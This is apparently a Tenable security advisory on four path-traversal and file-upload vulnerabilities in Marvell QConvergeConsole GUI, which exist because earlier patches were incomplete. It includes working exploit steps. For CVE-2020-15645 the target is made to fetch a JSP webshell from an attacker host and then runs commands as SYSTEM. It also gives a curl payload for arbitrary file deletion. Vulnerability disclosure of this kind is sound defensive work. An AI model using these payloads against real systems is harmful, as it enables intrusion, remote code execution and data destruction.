Synopsis
Tenable Research discovered multiple vulnerabilities in Marvell QConvergeConsole GUI resulting from incomplete patches for previously published and patched vulnerabilities.
CVE-2020-15643: saveAsText Directory Traversal Remote Code Execution Vulnerability
The previous fix for this vulnerability only checks the name parameter for path traversal; it does not check the prePath parameter.
If an authenticated, remote attacker specifies prePath="QCCAgentInstallers", name="webshell.jsp" and data=<contents_of_the_webshell_jsp_file>, the saveAsText method will create a malicious web shell in the context path of the QCCAgentInstallers web application, which does not require authentication.
The attacker can then send a command to the JSP web shell, which is running under the security context of the SYSTEM or root account.
See the Proof of Concept here on GitHub.
CVE-2020-15644: setAppFileBytes Directory Traversal Remote Code Execution Vulnerability
The previous fix for this vulnerability only checks the name parameter for path traversal; it does not check the prePath parameter.
If an authenticated, remote attacker specifies prePath="QCCAgentInstallers", name="webshell.jsp", iType=4, data=<contents_of_the_webshell_jsp_file>, and iMode=1, the setAppFileBytes method will create a malicious web shell in the context path of the QCCAgentInstallers web application, which does not require authentication.
The attacker can then send a command to the JSP web shell, which is running under the security context of the SYSTEM or root account.
See the Proof of Concept here on GitHub.
CVE-2020-15645: getFileFromURL Unrestricted File Upload Remote Code Execution Vulnerability
The previous fix appears to have a logic error. Its intention looks to be to restrict the file download URL to download.qlogic.com, but it instead does the opposite (restricting download URLs containing download.qlogic.com).
public synchronized String getFileFromURL(String urlString, boolean bIsWarFile) {
if (urlString.contains("download.qlogic.com")) {
Trace.warn("getFileFromURL: suspecious URL name, skipping operation.");
return "";
[...]
An authenticated, remote attacker can upload a malicious JSP file and execute it as SYSTEM or root.
# 1) Craft a JSP webshell # 2) Run an httpd on the attacker host to serve the JSP webshell root@host:/tmp# python3 -m http.server 8000 & [1] 3477 root@host:/tmp# Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... # 3) Instruct the QCC host to download the JSP webshell from attacker's host # The JSP webshell will be saved in the context path of the QConvergeConsole web application root@host:/tmp# curl -si --cookie 'JSESSIONID=<valid_authenticated_JSESSIONID>' -H 'Content-Type: text/x-gwt-rpc; charset=UTF-8' -H 'X-GWT-Permutation: deadbeef' -d '7|0|7|http://<qcc_host>:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|getFileFromURL|java.lang.String/2004016611|Z|http://<attacker_host>:8000/webshell.jsp|1|2|3|4|2|5|6|7|0|' http://<qcc_host>:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/gwttestservice # 4) Send a command to the JSP webshell root@host:/tmp# curl --cookie 'JSESSIONID=<valid_authenticated_JSESSIONID>' http://<qcc_host>:8080/QConvergeConsole/webshell.jsp?cmd=whoami <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> Command: whoami<BR> nt authority\system </pre> </BODY></HTML>
CVE-2020-5803: deleteAppFile Authenticated Path Traversal to File Deletion
The deleteAppFile method of the GWTTestServiceImpl class lacks proper validation of a user-supplied path prior to using it in file deletion operations. An authenticated, remote attacker can leverage this vulnerability to delete arbitrary remote files as SYSTEM or root.
curl -si --cookie 'JSESSIONID=<valid_authenticated_JSESSIONID>' \
-H 'Content-Type: text/x-gwt-rpc; charset=UTF-8' \
-H 'X-GWT-Permutation: deadbeef' \
-d '7|0|8|http://<qcc_host>:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|deleteAppFile|java.lang.String/2004016611|I||../../../../../../../../../<path_of_file_to_be_deleted>|1|2|3|4|3|5|5|6|7|8|8|' \
http://<qcc_host>:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/gwttestservice Solution
Marvell notified Tenable that they are currently developing a software release update. No solution is currently available.Additional References
https://www.marvell.com/content/dam/marvell/en/public-collateral/fibre-channel/marvell-fibre-channel-security-advisory-2020-07.pdfDisclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team